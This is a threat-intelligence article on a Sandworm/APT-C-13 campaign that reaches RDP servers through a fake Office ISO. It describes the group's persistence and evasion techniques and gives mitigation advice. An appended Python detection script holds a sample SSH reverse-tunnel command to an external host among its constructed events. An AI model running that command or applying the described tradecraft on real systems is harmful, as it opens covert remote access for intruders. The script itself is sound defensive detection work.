A sophisticated state-backed hacking group, notorious for targeting critical sectors, is now focusing on Remote Desktop Protocol (RDP) servers. This group, identified as APT-C-13 and also known by names such as Sandworm and APT44, has been active in cyber espionage operations since 2009. Their latest campaign signifies a strategic move towards long-term infiltration aimed at intelligence gathering.
Change in Strategy: From Destruction to Infiltration
APT-C-13 has shifted its approach from immediate disruption to sustained espionage. This campaign uses a deceptive ISO image named Microsoft.Office.2025×64.v2025.iso, distributed on Telegram and other platforms, primarily targeting users in Ukraine. Upon mounting the image, unsuspecting users trigger hidden executables that begin the infection process.
By exploiting the trust associated with familiar software names, these executables install a loader that profiles the victim’s system, preparing it for further malicious payloads. Weixin’s 360 Threat Intelligence Center has confirmed that APT-C-13 is utilizing a modular framework known as the Tambur/Sumbur/Kalambur series.
Technical Details and Impact
The campaign relies on legitimate Windows tools such as PowerShell and SSH to stay below the radar of conventional antivirus software. This strategic patience allows the attackers to extract sensitive information over months. The group achieves persistence through scheduled tasks that mimic legitimate Windows components, maintaining constant access via the RDP service.
Further control is established using the Kalambur and Sumbur modules, which channel command-and-control traffic through the Tor network, concealing the attackers’ locations. SSH reverse tunneling allows remote access to infected systems, while Sumbur integrates seamlessly with Windows processes, further obfuscating its presence.
Recommendations for Mitigation
The DemiMur module exacerbates the threat by injecting a forged root certificate that causes Windows to trust the attackers’ malicious payloads. Combined with the disabling of Microsoft Defender protections, this leaves the system exposed. To counteract this, organizations should block unauthorized ISO images and activation tools, and monitor internal network activity for anomalies.
Ensuring endpoint security is up-to-date and conducting regular scans are crucial steps. Additionally, institutions should enhance auditing practices and establish detection rules for unusual RDP and SSH activity, mitigating the risk of long-term data breaches.
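As an added illustration, not taken from the article or from 360 Threat Intelligence Center's report, the Python script below applies three detection rules to constructed Windows Security event records: a scheduled task registered under a Windows-looking name but launching a binary outside system directories, an RDP (logon type 10) session from an address outside the organisation's expected ranges, and ssh.exe started with a remote port forward. The record format, the internal address ranges and all sample values are assumptions for the demonstration.

```python
"""Triage constructed Windows Security events (IDs 4698, 4624, 4688) for the
behaviours the article describes. Records are simplified dicts, as a SIEM
might export them; every value below is a constructed sample."""
import re

SAMPLE_EVENTS = [  # constructed, not campaign data
    {"id": 4698, "task": "\\Microsoft\\Windows\\UpdateOrchestrator\\Refresh",
     "command": "C:\\Users\\Public\\svchost.exe"},               # Windows-like name, user path
    {"id": 4698, "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "C:\\Windows\\System32\\defrag.exe"},            # benign built-in task
    {"id": 4624, "logon_type": 10, "user": "jdoe", "src_ip": "10.0.5.23"},    # RDP, office range
    {"id": 4624, "logon_type": 10, "user": "jdoe", "src_ip": "203.0.113.7"},  # RDP, external
    {"id": 4688, "process": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.9"},       # reverse tunnel to RDP
    {"id": 4688, "process": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe admin@gitserver.internal"},                          # ordinary SSH use
]

SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
INTERNAL_NETS = ("10.", "192.168.")  # assumption: where RDP sessions normally originate

def check_task(ev):
    """4698: task name under \\Microsoft\\Windows but executable outside system dirs."""
    mimics = ev["task"].lower().startswith("\\microsoft\\windows\\")
    outside = not ev["command"].lower().startswith(SYSTEM_DIRS)
    return mimics and outside

def check_rdp(ev):
    """4624 with logon type 10 (RemoteInteractive) from an unexpected source address."""
    return ev.get("logon_type") == 10 and not ev["src_ip"].startswith(INTERNAL_NETS)

def check_ssh(ev):
    """4688: ssh.exe invoked with -R, i.e. a remote port forward (reverse tunnel)."""
    is_ssh = ev["process"].lower().endswith("ssh.exe")
    return is_ssh and re.search(r"(^|\s)-R\b", ev["cmdline"]) is not None

RULES = {4698: ("scheduled task mimics Windows component", check_task),
         4624: ("RDP logon from unexpected source", check_rdp),
         4688: ("ssh reverse tunnel", check_ssh)}

def triage(events):
    """Return (event id, reason) for each record that matches its rule."""
    hits = []
    for ev in events:
        reason, rule = RULES.get(ev["id"], (None, None))
        if rule and rule(ev):
            hits.append((ev["id"], reason))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Real deployments would read these fields from forwarded event logs and tune the address ranges and system directories to the environment.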
